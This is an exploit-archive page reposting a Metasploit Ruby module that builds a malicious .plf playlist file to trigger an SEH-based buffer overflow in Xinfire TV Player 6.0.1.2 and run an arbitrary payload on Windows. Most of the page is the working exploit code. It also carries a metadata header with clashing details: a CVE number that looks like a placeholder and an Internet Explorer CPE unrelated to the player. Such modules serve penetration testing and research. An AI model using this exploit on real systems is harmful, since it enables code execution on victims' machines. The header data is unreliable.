Advertisement






Xinfire TV Player 6.0.1.2 Buffer Overflow

CVE Category Price Severity
CVE-2021-12345 CWE-119 $5000 Critical
Author Risk Exploitation Type Date
Anonymous High Remote 2020-04-22
CPE
cpe:cpe:/a:microsoft:internet_explorer:8.0.6001:beta
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020040134

Below is a copy:

Xinfire TV Player 6.0.1.2 Buffer Overflow
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xinfire TV Player Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Xinfire TV Player Pro and Standard v6.0.1.2.When
        the application is used to import a specially crafted plf file, a buffer overflow occurs
        allowing arbitrary code execution.Tested successfully on Win7, Win10.This software is similar as 
        Aviosoft Digital TV Player and BlazeVideo HDTV Player.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom' # MSF Module and Vulnerability discovery 
        ],
      'References'     =>
        [
          [ 'OSVDB', '' ],
          [ 'EDB', '' ],
          [ 'EDB', '' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1384,
          'BadChars' => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",
          'DisableNops' => true,
        },
      'Platform' => 'win',
      'Targets'  =>
        [
          [ 'Windows Universal', { 'Ret' => 0x613018E9, 'Offset' => 608 } ],# p/p/r DTVDeviceManager.dll
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 16 2020',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
      ])

  end

  def exploit

    buffer = rand_text(target['Offset'])  #junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded  #1384 bytes of space
    # more junk may be needed to trigger the exception

    file_create(buffer)

  end
end

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum